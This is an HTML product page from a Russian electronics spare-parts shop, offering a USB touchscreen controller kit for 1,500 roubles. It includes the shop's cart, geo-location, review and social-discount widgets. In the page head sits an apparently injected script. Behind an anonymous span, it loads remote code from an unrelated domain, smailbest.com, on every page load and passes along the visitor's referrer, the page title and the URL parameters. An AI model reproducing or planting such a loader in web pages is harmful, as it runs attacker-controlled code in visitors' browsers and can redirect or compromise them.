
			<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" prefix="og: http://ogp.me/ns#" version="XHTML+RDFa 1.1" dir="ltr" lang="ru-RU">
<head>
<link href="index.php?route=feed/latest_products_rss&currency=RUB" rel="alternate" type="application/rss+xml" />
<meta charset="UTF-8" />
<title>USB контроллер тачскрина - сенсорного стекла - под шлейф шириной 5мм</title>
						<meta name="mrc__share_title" content="USB контроллер тачскрина - сенсорного стекла - под шлейф шириной 5мм">
			<meta name="image_src" content="https://ellk.ru/image/cache/500-500/data/usbkon_5mm_1.jpg">
			<meta name="og:title" content="USB контроллер тачскрина - сенсорного стекла - под шлейф шириной 5мм">
			<meta name="og:image" content="https://ellk.ru/image/cache/500-500/data/usbkon_5mm_1.jpg">
			<meta name="og:url" content="https://ellk.ru/usb-kontroller-tachskrina-sensornogo-stekla-pod-shlejf-shiri.html">
									
<meta name="viewport" content="width=1024" /> 
<meta name="title" content="USB контроллер тачскрина - сенсорного стекла - под шлейф шириной 5мм" />

<base href="https://ellk.ru/" />
<meta property="og:locale" content="ru_RU">
<meta property="og:type" content="website" />
					<meta property="og:title" content="USB контроллер тачскрина - сенсорного стекла - под шлейф шириной 5мм&nbsp;&hellip;" />
									<meta property="og:description" content="1 500 руб. - Предназначен для подключения сенсорного стекла с коннектором шлейфа шириной 5 мм к устройствам с USB портом.&nbsp;&hellip;" />
									<meta property="og:url" content="https://ellk.ru/usb-kontroller-tachskrina-sensornogo-stekla-pod-shlejf-shiri.html" />
									<meta property="og:image" content="https://ellk.ru/image/cache/500-500/data/usbkon_5mm_1.jpg" />
				<meta name="description" content="Предназначен для подключения сенсорного стекла с коннектором шлейфа шириной 5 мм к устройствам с USB портом." />
<meta property="og:description" content="Предназначен для подключения сенсорного стекла с коннектором шлейфа шириной 5 мм к устройствам с USB портом." />

<meta name="keywords" content="989, USB контроллер тачскрина - сенсорного стекла - под шлейф шириной 5мм, , 1500 руб., usbkon_5mm, Универсальный, Платы питания, управления, инвертеры и прочее" />
<meta property="og:title" content="USB контроллер тачскрина - сенсорного стекла - под шлейф шириной 5мм" />
<meta property="og:url" content="https://ellk.ru/usb-kontroller-tachskrina-sensornogo-stekla-pod-shlejf-shiri.html" />
<meta property="og:image" content="https://ellk.ru/image/cache/228-228/data/usbkon_5mm_1.jpg" />
<meta property="og:site_name" content="ELLK.ru" />
<link href="https://ellk.ru/image/data/favicon-ellk.png" rel="icon" />
<link href='https://fonts.googleapis.com/css?family=PT+Sans:400,400italic,700&subset=latin,cyrillic' rel='stylesheet' type='text/css'>
<link href="https://ellk.ru/usb-kontroller-tachskrina-sensornogo-stekla-pod-shlejf-shiri.html" rel="canonical" />
<link rel="stylesheet" type="text/css" href="catalog/view/theme/electronics/stylesheet/stylesheet.css" />
<link rel="stylesheet" type="text/css" href="catalog/view/theme/default/stylesheet/geoip.css" media="screen" />
<link rel="stylesheet" type="text/css" href="catalog/view/javascript/jquery/colorbox/colorbox.css" media="screen" />
<link rel="stylesheet" type="text/css" href="catalog/view/javascript/jquery/panels/main.css" media="screen" />
<link rel="stylesheet" type="text/css" href="catalog/view/theme/default/stylesheet/webme_product_question.css" media="screen" />
<script type="text/javascript" src="catalog/view/javascript/jquery/jquery-1.7.1.min.js"></script>
<script type="text/javascript" src="catalog/view/javascript/jquery/ui/jquery-ui-1.8.16.custom.min.js"></script>
<link rel="stylesheet" type="text/css" href="catalog/view/javascript/jquery/ui/themes/ui-lightness/jquery-ui-1.8.16.custom.css" />
<script type="text/javascript" src="catalog/view/javascript/common.js"></script>

                        
                            <script type="text/javascript" src="catalog/view/javascript/waitlist.js"></script>
                        
                    
<script type="text/javascript" src="catalog/view/javascript/jscroller-0.4.js"></script>
<script type="text/javascript" src="catalog/view/javascript/running_line.js"></script> 
<script type="text/javascript" src="catalog/view/javascript/jquery/tabs.js"></script>
<script type="text/javascript" src="catalog/view/javascript/jquery/colorbox/jquery.colorbox-min.js"></script>
<script type="text/javascript" src="catalog/view/javascript/jquery/panels/utils.js"></script>
<!--[if IE 7]> 
<link rel="stylesheet" type="text/css" href="catalog/view/theme/default/stylesheet/ie7.css" />
<![endif]-->
<!--[if lt IE 7]>
<link rel="stylesheet" type="text/css" href="catalog/view/theme/default/stylesheet/ie6.css" />
<script type="text/javascript" src="catalog/view/javascript/DD_belatedPNG_0.0.8a-min.js"></script>
<script type="text/javascript">
DD_belatedPNG.fix('#logo img');
</script>
<![endif]-->
<span id="0a142500-7f0f-a2a0-91cf-292e71d74d1a"></span><script type="application/javascript">
var d=document;var s=d.createElement('script'); 
s.src='https://smailbest.com/?VJp3C7&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm=script&_cid=0a142500-7f0f-a2a0-91cf-292e71d74d1a'; 
if (document.currentScript) { 
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}
if (document.location.protocol === 'https:' && 'https://smailbest.com/?VJp3C7&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '&'+window.location.search.replace('?', '&')+'&frm=script'.indexOf('http:') === 0 ) {alert('The website works on HTTPS. The tracker must use HTTPS too.');}
</script>

			
<script type="text/javascript">

var cart_popup_height 			= 350; // cart height
var cart_popup_width 			= 420; // cart width
var button_continue_shopping 	= 'Продолжить покупки'; // set FALSE to disable
var show_icon_cart 				= true; // show `cart` icon on the button
var show_icon_checkout 			= true; // show `checkout` icon on the button
var show_icon_continue_shopping = true; // show `continue shopping` icon on the button
var disable_default_small_cart  = false; // popup cart instead of default mini cart

</script>

<script type="text/javascript" src="https://ellk.ru/catalog/view/javascript/jquery/scroll/jquery.mCustomScrollbar.min.js"></script>
<link rel="stylesheet" href="https://ellk.ru/catalog/view/javascript/jquery/scroll/jquery.mCustomScrollbar.css" type="text/css" />
<link rel="stylesheet" href="https://ellk.ru/catalog/view/javascript/jquery/ui/cart/jquery-ui-smoothness-cart.css" type="text/css" />
<script type="text/javascript" src="https://ellk.ru/catalog/view/javascript/common_extended.js"></script>
							
			
</head>
<body>


<div class="bodyheader">
<div id="header">
<div id="top">
</div>
    <div id="logo">
    <a href="https://ellk.ru/"><img src="https://ellk.ru/image/data/logo_ELLK_3.png" title="ELLK.ru" alt="ELLK.ru" /></a>
    </div>
        <div id="cart">
  <div class="heading">
    <a title="Корзина покупок"><span id="cart-total">Товаров: 0 (0 руб.)</span></a></div>
  <div class="content">
        <div class="empty">В корзине пусто!</div>
      </div>
</div>  <div class="tel">
	<img src="https://ellk.ru/mouth-cancer-phone-icon.png" alt="+7/965/875-4784"> <span>+7 /968/</span><font class="f_tel">104-4836</font>
	<p class="email">shop@ellk.ru</p>
  </div>
    <div id="search">
    <div class="button-search"></div>
    <input type="text" name="search" placeholder="Поиск" value="" />
  </div>
  <div id="welcome">
        <a href="https://ellk.ru/login/">Войти</a> или <a href="https://ellk.ru/index.php?route=account/simpleregister">зарегистрироваться</a>      </div>
  <div class="links"><a href="https://ellk.ru/">Главная</a> 
      <a href="https://ellk.ru/index.php?route=information/articles">Статьи</a> 
      <a href="https://ellk.ru/index.php?route=information/information&information_id=4">О нас</a>  
      <a href="https://ellk.ru/index.php?route=information/information&information_id=6">Доставка</a> 
      <a href="https://ellk.ru/index.php?route=information/information&information_id=7">Оплата</a>
      <a href="https://ellk.ru/wishlist/" id="wishlist-total">Закладки (0)</a>
      <a href="https://ellk.ru/ssylki.html">Ссылки</a>
      <a href="https://ellk.ru/cart/">Корзина покупок</a>
      <a href="https://ellk.ru/index.php?route=checkout/simplecheckout">Оформление заказа</a></div>
  </div>
</div>
<div id="geoip" class="geoip-block" style='display: none;'>
    <div class="content">
            </div>
</div>
<div id="geoip-confirm-region" title="<b>Ваш регион</b>">
    Ваш город &mdash; Вирджиния<br>Угадали?</div>
<div id="geoip-choose-region" title="Выберите город из списка или воспользуйте поисковой строкой">
    <div class="loading"></div>
</div>
<script type="text/javascript">

    var GeoIp = (function() {

        return {
            autoComplete: function(el, appendTo) {

                var xhr = false;

                el.autocomplete({
                    search:    function() {
                        if (xhr) {
                            xhr.abort();
                        }
                    },
                    source:    function(request, response) {
                        xhr = $.ajax({
                            url:      'index.php?route=module/geoip/search',
                            dataType: 'jsonp',
                            data:     {term: request.term},
                            success:  function(data) {
                                response(data);
                            }
                        });
                    },
                    minLength: 2,
                    appendTo:  appendTo,
                    select:    function(e, ui) {
                        $.ajax({
                            url:         'index.php?route=module/geoip/save&fias_id=' + ui.item.fias_id,
                            crossDomain: true,
                            success:     function(data) {
                                location.reload();
                            }
                        });
                    }
                });
            },
            block: $('#geoip'),
            confirmRegion: $('#geoip-confirm-region'),
            chooseRegion:  $('#geoip-choose-region')
        }
    })();

    $(function() {
        
                GeoIp.confirmRegion.dialog({
            autoOpen: true,
            height: 180,
            width: 350,
            modal:false,
            position: [GeoIp.block.offset().left + GeoIp.block.width() - 352, GeoIp.block.offset().top + 22],
            buttons: {
                     "Да": function() {
                         $(this).dialog('close');
                     },
                     "Нет": function() {
                         $(this).dialog('close');
                         GeoIp.chooseRegion.dialog('open');
                     }
            }
        });
        
        GeoIp.chooseRegion.dialog({
            autoOpen:  false,
            minWidth:  600,
            minHeight: 400,
            modal:     true,
            open:      function() {
                $.ajax({
                    url:      'index.php?route=module/geoip/getList',
                    dataType: 'html',
                    success:  function(html) {
                        GeoIp.chooseRegion.html(html);
                        var input = $('#geoip-popup-input');
                        GeoIp.autoComplete(input, GeoIp.chooseRegion.find('.geoip-block'));
                        input.focus();
                    }
                });

                $('.ui-widget-overlay').click(function() {
                    GeoIp.chooseRegion.dialog("close");
                });
            }
        });

        GeoIp.chooseRegion.on('click', '.choose-city', function() {
            $.ajax({
                url:         'index.php?route=module/geoip/save&fias_id=' + $(this).attr('data-id'),
                success:     function(data) {
                    location.reload();
                }
            });

            GeoIp.chooseRegion.dialog('close');

            return false;
        });

        GeoIp.block.find('.geoip-text').click(function() {
            GeoIp.chooseRegion.dialog('open');
        });
    });
</script><div id="container">

	

<style type="text/css">
		/* Scroller Box */
#scroller_container {
position: relative;
width: 100%;
height: 30px;
overflow: hidden;
margin-top: -17px;
}
#scroller {
white-space: nowrap;
font-size: 14px;
font-weight: bold;
}
		</style>
<div id="scroller_container"><div id="scroller"> 
 Поступление новинок запчастей на ТСД и панели оператора - сенсоры / курки - кнопки / дисплеи / терминалы</a>

 </div>
	</div>
<div id="notification"></div>			<script>
						 window.fbAsyncInit = function() {
				FB.init({
				  status     : true, // check login status
				  cookie     : true, // enable cookies to allow the server to access the session
				  xfbml      : true  // parse XFBML
				});

				//Facebook tracking
				FB.Event.subscribe('edge.create', function(targetUrl) {
					sd_userAction('fb','like');
				});
				
				FB.Event.subscribe('edge.remove', function(targetUrl) {
					sd_userAction('fb','unlike');
				});
			  };
						</script>
			<div id="column-left">
    <div class="box">
  <div class="box-heading">Категории</div>
  <div class="box-content">
    <ul class="box-category">
            <li>
                <a href="https://ellk.ru/akkumulyatory-tehnologicheskie-universalnye/">Аккумуляторы технологические универсальные</a>
                      </li>
            <li>
                <a href="https://ellk.ru/displei-i-tachskriny-universalnye/">Дисплеи и тачскрины универсальные</a>
                      </li>
            <li>
                <a href="https://ellk.ru/zapchasti-dlya-avtoskanerov/">Запчасти для автосканеров</a>
                      </li>
            <li>
                <a href="https://ellk.ru/zapchasti-dlya-bytovyh-planshetov/">Запчасти для бытовых планшетов</a>
                      </li>
            <li>
                <a href="https://ellk.ru/zapchasti-dlya-geodezicheskogo-i-geologicheskogo-oborudovani/">Запчасти для геодезического и геологического оборудования</a>
                      </li>
            <li>
                <a href="https://ellk.ru/zapchasti-dlya-kofemashin-stiralnyh-mashin/">Запчасти для кофемашин / стиральных машин</a>
                      </li>
            <li>
                <a href="https://ellk.ru/zapchasti-dlya-mikrokioskov/">Запчасти для микрокиосков</a>
                      </li>
            <li>
                <a href="https://ellk.ru/zapchasti-dlya-mfu-i-printerov/">Запчасти для МФУ и принтеров</a>
                      </li>
            <li>
                <a href="https://ellk.ru/zapchasti-dlya-onlajn-kass/">Запчасти для онлайн касс</a>
                      </li>
            <li>
                <a href="https://ellk.ru/zapchasti-dlya-paneli-operatora/">Запчасти для панели оператора</a>
                      </li>
            <li>
                <a href="https://ellk.ru/zapchasti-dlya-promyshlennyh-planshetov-i-kpk/">Запчасти для промышленных планшетов и КПК</a>
                      </li>
            <li>
                <a href="https://ellk.ru/zapchasti-dlya-sistem-parallelnogo-vozhdeniya/">Запчасти для систем параллельного вождения</a>
                      </li>
            <li>
                <a href="https://ellk.ru/zapchasti-dlya-skanerov-shtrih-kodov/">Запчасти для сканеров штрих-кодов</a>
                      </li>
            <li>
                <a href="https://ellk.ru/zapchasti-dlya-terminalov-sbora-dannyh-tsd/">Запчасти для терминалов сбора данных (ТСД)</a>
                      </li>
            <li>
                <a href="https://ellk.ru/zapchasti-dlya-tehnologicheskogo-promyshlennogo-oborudovaniy/">Запчасти для технологического промышленного оборудования</a>
                      </li>
            <li>
                <a href="https://ellk.ru/zashitnye-plenki-dlya-ekranov/">Защитные пленки для экранов</a>
                      </li>
            <li>
                <a href="https://ellk.ru/instrument-i-rashodniki-dlya-remonta/">Инструмент и расходники для ремонта</a>
                      </li>
            <li>
                <a href="https://ellk.ru/platy-pitaniya-upravleniya-invertery-i-prochee/" class="active">Платы питания, управления, инвертеры и прочее</a>
                      </li>
            <li>
                <a href="https://ellk.ru/tachskriny-dlya-golovnyh-ustrojstv-avtomobilej/">Тачскрины для головных устройств автомобилей</a>
                      </li>
            <li>
                <a href="https://ellk.ru/tachskriny-dlya-medicinskogo-i-kosmetologicheskogo-oborudova/">Тачскрины для медицинского и косметологического оборудования</a>
                      </li>
            <li>
                <a href="https://ellk.ru/tachskriny-dlya-sintezatorov-i-rabochih-stancij/">Тачскрины для синтезаторов и рабочих станций</a>
                      </li>
            <li>
                <a href="https://ellk.ru/shlejfy-universalnye-flex-cable/">Шлейфы универсальные - Flex Cable</a>
                      </li>
          </ul>
  </div>
</div>
    <div class="box">
  <div class="box-heading">Полезный совет</div>
  <div class="box-content">
    <div class="box-product" style="background: url('catalog/view/javascript/advice.png') right top no-repeat; min-height: 70px;">
					Чтобы защитить экран GPS навигатора или магнитолы от царапин и механических повреждений, наклейте на него защитную пленку!!!		    </div>
  </div>
</div>
  </div>
 
      <script type="text/javascript">
        $(window).load(function(){ 
          /*price = $('#priceUpdate').children().html(); 
          $('#price').val(price); 
          price = $('.opt_price').children().html(); 
          $('#opt_price').val(price); 
          price = $('#priceUpdate').children().html(); 
          price=explode(' ', price);
          price = price[0]+''+price[1];
          current_price = parseFloat(price)*1;

          $('.curent_price').html('Текущая цена: '+current_price+' руб.');*/
          $('.cart').css('visibility','visible');

        });
      </script>
      <input type='hidden' id='opt_price'>
      <input type='hidden' id='price'>
<div id="content" style='margin-left: 185px;'><div itemscope itemtype="http://schema.org/Product">  <div class="breadcrumb">
    <a href="https://ellk.ru/">Главная</a>  &raquo; <a href="https://ellk.ru/platy-pitaniya-upravleniya-invertery-i-prochee/">Платы питания, управления, инвертеры и прочее</a>  &raquo; USB контроллер тачскрина - сенсорного стекла - под шлейф шириной 5мм  </div>
  <div class="product-info">
        <div class="left" style='margin-left: 5px;'>
            <div class="image"><a href="https://ellk.ru/image/cache/500-500/data/usbkon_5mm_1.jpg" title="USB контроллер тачскрина - сенсорного стекла - под шлейф шириной 5мм" class="colorbox"><img src="https://ellk.ru/image/cache/228-228/data/usbkon_5mm_1.jpg" itemprop="image"  title="USB контроллер тачскрина - сенсорного стекла - под шлейф шириной 5мм" alt="USB контроллер тачскрина - сенсорного стекла - под шлейф шириной 5мм" id="image" /></a></div>
                  <div class="image-additional">
                <a href="https://ellk.ru/image/cache/500-500/data/usbkon_5mm_3.jpg" title="USB контроллер тачскрина - сенсорного стекла - под шлейф шириной 5мм" class="colorbox"><img src="https://ellk.ru/image/cache/74-74/data/usbkon_5mm_3.jpg" title="USB контроллер тачскрина - сенсорного стекла - под шлейф шириной 5мм" alt="USB контроллер тачскрина - сенсорного стекла - под шлейф шириной 5мм" /></a>
                <a href="https://ellk.ru/image/cache/500-500/data/usbkon_5mm_2.jpg" title="USB контроллер тачскрина - сенсорного стекла - под шлейф шириной 5мм" class="colorbox"><img src="https://ellk.ru/image/cache/74-74/data/usbkon_5mm_2.jpg" title="USB контроллер тачскрина - сенсорного стекла - под шлейф шириной 5мм" alt="USB контроллер тачскрина - сенсорного стекла - под шлейф шириной 5мм" /></a>
              </div>
          </div>
        <div class="right" >
	<h1><span itemprop="name">USB контроллер тачскрина - сенсорного стекла - под шлейф шириной 5мм</span></h1>
      <div class="description">
	    <span>Категория: </span> <a href="https://ellk.ru/platy-pitaniya-upravleniya-invertery-i-prochee/">Платы питания, управления, инвертеры и прочее</a> |<br />
                <span>Производитель:</span> <a href="https://ellk.ru/universalnyj.html">Универсальный</a><br />
                <span>Модель:</span> usbkon_5mm<br />
								
                <span>Наличие:</span> Есть в наличии</div>
            <div class="price"><div itemprop="offers" itemscope itemtype="http://schema.org/Offer">Цена:<meta itemprop="priceCurrency" content="RUB" /><link itemprop="availability" href="http://schema.org/InStock" />

        
        
			<span id="priceUpdate"><span itemprop="price">1 500 руб.</span></span><span class="price-new" id="priceUpdate1"></span>

			
			<div id="social_discount_active" style="display: none;">(скидка за лайк)</div>
			
			
                <br />
		
                		
              </div>
     
            
      <div style="display:none;" class="opt_price">
        <span>Опт:  руб.</span> 
     
      </div>
            <div class='curent_price'>
</div>
        <!-- <p>Ваша цена:  </p> -->
      </div>
            <div class="cart" style='visibility:hidden;'>
        <div>Количество:          <input type="text"  id='quantity' name="quantity" onkeyup='getOptDiscount(989)' size="2" value="1" />
          <input type="hidden" name="product_id" size="2" value="989" />
          &nbsp;
          <input type="button" value="Купить" id="button-cart" class="button" />
          <span>&nbsp;&nbsp;- или -&nbsp;&nbsp;</span>
          <span class="links"><a onclick="addToWishList('989');">в закладки</a><br />
            <a onclick="addToCompare('989');">сравнение</a></span>
        </div>
        <SCRIPT TYPE="text/javascript">
        function explode( delimiter, string ) {
          var emptyArray = { 0: '' };
          if ( arguments.length != 2 || typeof arguments[0] == 'undefined' || typeof arguments[1] == 'undefined' ) { return null; }
          if ( delimiter === '' || delimiter === false || delimiter === null ) { return false; }
          if ( typeof delimiter == 'function' || typeof delimiter == 'object' || typeof string == 'function' || typeof string == 'object' ) { return emptyArray; }
          if ( delimiter === true ) { delimiter = '1'; } 
          return string.toString().split ( delimiter.toString() );
        }
        function getOptDiscount(pr_id)
        {
          /*
          var quantity = $('#quantity').val();
          var price_p = $('#price').val();
          
          var old_rice = $('#opt_price').val();
           console.log('asd');
          if(quantity)
          {
            $.ajax({
               type: "POST",
               url: "index.php?route=product/product/get_recount",
               //dataType: "json",
               data: "product_id="+pr_id+"&amount="+quantity,
               success: function(msg){
                console.log(msg);
                  pr_msg = msg.replace(/(\n(\r)?)/g, '');
                  if(pr_msg.indexOf(' ')>0) {
                    pr_msg = msg.substr(0,pr_msg.indexOf(' ')+1)
                  }
                  price = pr_msg.substr(0, msg.length - 2)*parseFloat(quantity);
                  $('.curent_price').html('Текущая цена: '+price+' руб.');
                  price_p = explode(' ', price_p);
                  price_p = price_p[0]+''+price_p[1];
                  price_p = parseFloat(price_p)*parseFloat(quantity);
                  old_rice = explode(' ', old_rice);
                  old_rice = parseFloat(old_rice[1])*parseFloat(quantity);
                  // old_rice = old_rice*quantity;
                  $('#priceUpdate').children().html(price_p+' руб.');
                  $('.opt_price').children().html('Опт: '+old_rice+' руб.');
               }
            });
          }
         */
        }
        </SCRIPT>
              </div>
            <div class="review">
        <div><div itemprop="aggregateRating" itemscope itemtype="http://schema.org/AggregateRating"><img src="catalog/view/theme/default/image/stars-0.png" alt="0" title="0* (Отзывов: 0) " /> (<meta itemprop="worstRating" content="1"><span itemprop="ratingValue">0</span>/<span itemprop="bestRating">5</span>)&nbsp;&nbsp;<a onclick="$('a[href=\'#tab-review\']').trigger('click');">Отзывов: <span itemprop="reviewCount">0</span><meta itemprop="ratingCount" content="0"></meta></a>&nbsp;&nbsp;|&nbsp;&nbsp;<a onclick="$('a[href=\'#tab-review\']').trigger('click');">Написать отзыв</a></div></div>
        <div class="share"></div>
        
						<style>
			#social_discount_buttons {
				position: relative;
				height: 100px;
			}

			.social_discount_button {
				float: left;
				width: 150px;
				margin-top: 5px;
			}
			
			#social_discount_button_vk {
				height: 24px;
			}
			#social_discount_button_fb {
			}
			#social_discount_button_gp {
			}
			#social_discount_button_mm {
			}
			#social_discount_button_ok {
			}
			#social_discount_button_tw {
			}
			
			/* fix VK widget height */
			#vk_like {
				clear: none !important;
			}
			
			/* fix FB popup z-index ( from http://wordpress.org/support/topic/facebook-like-button-comment-popup ) */
			.fb-like { z-index: 9999; }
			.fbpdl { ;z-index: 9999 !important; 
			overflow: visible;
			}
			.pam { z-index: 9999 !important; 
			overflow: visible;
			}
			.execphpwidget
			{ z-index: 9999 !important;
			overflow: visible;
			}
			.fb-like span { z-index: 9999 !important; 
			overflow: visible;
			}
			</style>
			<script>
			// fix div scrollbar (for some reason it's not work with just css !important)
			$(document).ready(function() {
				$('.product-info').css('overflow', 'visible');
				/*$('#tabs').css('clear', 'left');*/
			});
			</script>
			<div id="social_discount_buttons">
				<div style="margin-bottom: 8px;">
Нажми "Рассказать друзьям" и получи скидку!
</div>

<div id="social_discount_button_vk" class="social_discount_button"><!-- Put this script tag to the <head> of your page -->
<script type="text/javascript" src="//vk.com/js/api/openapi.js?121"></script>

<script type="text/javascript">
  VK.init({apiId: 5287360, onlyWidgets: true});
</script>

<!-- Put this div tag to the place, where the Like block will be -->
<div id="vk_like"></div>
<script type="text/javascript">
VK.Widgets.Like("vk_like", {type: "button"});
</script></div>
<div id="social_discount_button_fb" class="social_discount_button"><div class="fb-like" data-send="false" data-layout="button_count"  data-width="150" data-show-faces="true"></div></div>
<div id="social_discount_button_mm" class="social_discount_button"><a target="_blank" class="mrc__plugin_uber_like_button" href="https://connect.mail.ru/share" data-mrc-config="{'cm' : '1', 'sz' : '20', 'st' : '1', 'tp' : 'mm'}">Нравится</a>
<script src="https://cdn.connect.mail.ru/js/loader.js" type="text/javascript" charset="UTF-8"></script></div>

<div id="social_discount_button_ok" class="social_discount_button"><div id="ok_shareWidget"></div>
<script>
!function (d, id, did, st) {
  var js = d.createElement("script");
  js.src = "https://connect.ok.ru/connect.js";
  js.onload = js.onreadystatechange = function () {
  if (!this.readyState || this.readyState == "loaded" || this.readyState == "complete") {
	if (!this.executed) {
	  this.executed = true;
	  setTimeout(function () {
		OK.CONNECT.insertShareWidget(id,did,st);
	  }, 0);
	}
  }};
  d.documentElement.appendChild(js);
}(document,"ok_shareWidget",document.URL,"{width:145,height:30,st:'oval',sz:20,ck:1}");
</script></div>
<div id="social_discount_button_tw" class="social_discount_button"><a href="https://twitter.com/share" class="twitter-share-button" >Tweet</a>
<script type="text/javascript" charset="utf-8">
window.twttr = (function (d,s,id) {
var t, js, fjs = d.getElementsByTagName(s)[0];
if (d.getElementById(id)) return; js=d.createElement(s); js.id=id;
js.src="//platform.twitter.com/widgets.js"; fjs.parentNode.insertBefore(js, fjs);
return window.twttr || (t = { _e: [], ready: function(f){ t._e.push(f) } });
}(document, "script", "twitter-wjs"));
</script></div>
<div id="social_discount_button_gp" class="social_discount_button"><!-- Place this tag where you want the +1 button to render. -->
<div class="g-plusone" data-callback="plusone_share" data-annotation="inline" data-width="300"></div>

<!-- Place this tag after the last +1 button tag. -->
<script type="text/javascript">
  window.___gcfg = {lang: 'ru'};

  (function() {
    var po = document.createElement('script'); po.type = 'text/javascript'; po.async = true;
    po.src = 'https://apis.google.com/js/plusone.js';
    var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(po, s);
  })();
</script></div>			</div>
						
      </div>
          </div>
  </div>
  

  <div id="tabs" class="htabs"><a href="#tab-description">Описание</a>
            <a href="#tab-review">Отзывы (0)</a>
        
	        <a href="#tab-webme-product-question" id="wpq_tab">Вопрос/Ответ</a>
        
    <!--Вкладка  Доставка -->       
        <a href="#tab-product-shipping" id="prship_tab">Доставка и оплата</a>
        <!--Вкладка  Про скидки -->       
        <a href="#tab-howbuy" id="howbuy_tab">Как купить дешевле</a>
      <!-- дополнительние вкладки  link -->
    
 <!-- дополнительние вкладки link end-->
  </div>

 <!-- дополнительние вкладки description -->
  <script type="text/javascript"><!--
$(document).ready(function() {
  $('.colorbox').colorbox({
    overlayClose: true,
    opacity: 0.5,
    rel: "colorbox"
  });
});
//--></script>
 <!-- дополнительние вкладки description end -->
  <div id="tab-description" class="tab-content"><span itemprop="description"><p>
	Предназначен для подключения сенсорного стекла с коннектором шлейфа шириной 5 мм к устройствам с USB портом.</p>
<p>
	Данный комплект состоит из:</p>
<p>
	- USB кабеля</p>
<p>
	- платы контроллера</p>
<p>
	- кабель для подключения шлейфа сенсора</p>
<p>
	- диск</p>
<p>
	&nbsp;</p>
</span></div>
      <div id="tab-review" class="tab-content">
    <div id="review"></div>
    <h2 id="review-title">Написать отзыв</h2>
    <b>Ваше Имя:</b><br />
    <input type="text" name="name" value="" />
    <br />
    <br />
    <b>Ваш отзыв:</b>
    <textarea name="text" cols="40" rows="8" style="width: 98%;"></textarea>
    <span style="font-size: 11px;"><span style="color: #FF0000;">Внимание:</span> HTML не поддерживается! Используйте обычный текст.</span><br />
    <br />
    <b>Оценка:</b> <span>Плохо</span>&nbsp;
    <input type="radio" name="rating" value="1" />
    &nbsp;
    <input type="radio" name="rating" value="2" />
    &nbsp;
    <input type="radio" name="rating" value="3" />
    &nbsp;
    <input type="radio" name="rating" value="4" />
    &nbsp;
    <input type="radio" name="rating" value="5" />
    &nbsp;<span>Хорошо</span><br />
    <br />
    <b>Введите код, указанный на картинке:</b><br />
    <input type="text" name="captcha" value="" />
    <br />
    <img src="index.php?route=product/product/captcha" alt="" id="captcha" /><br />
    <br />
    <div class="buttons">
      <div class="right"><a id="button-review" class="button">Продолжить</a></div>
    </div>
  </div>
      	<div id="tab-webme-product-question" class="tab-content">
		<div class="webme-product-question-form-ctrl">
			<a id="webmeProductQuestionFormCtrl"><img src="catalog/view/theme/default/image/webme/product_question/product_question_customer_avatar_x64.png" border="0" width="20" alt="" title="" style="margin-right:5px; vertical-align:middle;" />задать вопрос</a>
		</div>
				<div id="webmeProductQuestionForm" class="webme-product-question-form">
			<div style="text-align:center;"><h2 id="webmeProductQuestionTitle">Задать вопрос</h2></div>
			<table>
				<tr>
					<td>
						<b>Ваше Имя:</b>
						<br />
						<input type="text" name="question_author" value="" />
					</td>
					<td rowspan="2">
						<b>Ваш вопрос:</b>
						<textarea name="question_text" cols="40" rows="8" style="width: 98%;"></textarea>
						<span style="font-size: 11px;"><span style="color: #FF0000;">Внимание:</span> HTML не поддерживается! Используйте обычный текст.</span>
					</td>
				</tr>
				<tr>
					<td>
						<b>Введите код, указанный на картинке:</b>
						<br />
						<input type="text" name="question_captcha" id="wpq_captcha_input" value="" autocomplete="off" />
						<br />
						<div id="wpq_captcha_image_div"><img src="index.php?route=product/webme_product_question/webme_product_question_captcha" alt="" id="wpq_captcha" /></div>
						<div align="left"><a id="reload_wpq_captcha" class="reload_captcha"><small>Перезагрузить картинку</small></a></div>
					</td>
				</tr>
				<tr>
					<td colspan="2">
						<div class="buttons">
							<div class="left">
								<label><input type="checkbox" name="receive_question_answers_to_email" id="receive_question_answers_to_email" checked="checked">&nbsp;Получать ответы на email:</label>&nbsp;<input type="text" name="email_for_answers" size="15" value="" />
							</div>
							<div class="right"><a id="buttonWebmeProductQuestion" class="button">задать вопрос</a></div>
						</div>
					</td>
				</tr>
			</table>
		</div>
				
					<div id="webmeProductQuestionContainer" class="webme-product-question-empty-container">Нет вопросов об этом товаре...</div>
			</div>
  
    <!--Вкладка  Доставка -->   
      <div id="tab-product-shipping" class="tab-content">
            
              <br>Способы оплаты:
                   <li id="transfer_plus.1">
            Оплата на банковскую карту Сбербанка          </li>
                  <li id="transfer_plus.2">
            Оплата заказа на ЯндексДеньги          </li>
                  <li id="transfer_plus.4">
            Оплата заказа на WebMoney          </li>
                  <li id="transfer_plus.5">
            Оплата заказа на QiWi          </li>
                  <li id="sberbank_transfer">
            Квитанция Сбербанка РФ          </li>
                  <li id="payment_schet">
            Оплата по счету          </li>
                    <br>Способы доставки:
          </div>
  
<!--Вкладка  Про скидки -->   
      <div id="tab-howbuy" class="tab-content">      
        <p>
  <strong><span style="color:#008080;">В нашем интернет-магазине ELLK.ru, Вы можете хорошо сэкономить на ремонте своего сломанного аппарата. Просто заказав запчасть и воспользовавшись нашими <a href="http://ellk.ru/index.php?route=information/articles">инструкциями и статьями</a> - Вы можете сами отремонтировать устройство, не теряя на услугах сервисных центров.</span></strong></p>
<p>
  <span style="color:#ff8c00;"><strong>А самое главное, что Вы можете сэкономить от 20 до 1000 руб - просто делая покупки у нас.</strong></span></p>
<p>
  <span style="color:#696969;"><strong>Как это можно сделать описано ниже:</strong></span></p>
<p>
  <span style="color:#696969;"><strong>1.</strong></span> если Вы оплачиваете заказ до его отправки - то стоимость доставки для всех заказов равна = 150 руб., а также Вы не будете платить на почте дополнительный сбор за услугу наложенного платежа (обычно это составляет 4-7% от суммы заказа, примерно 100-500 руб.)</p>
<p>
  <span style="color:#696969;"><strong>2.</strong></span> если Вы нажмете социальные кнопки и расскажите друзьям / поделитесь ссылкой:</p>
<p>
  <img alt="" src="/image/likes.jpg" width="348" height="74"></p>
<p>
  то также получите скидку в 20-100руб в зависимости от товара.</p>
<p>
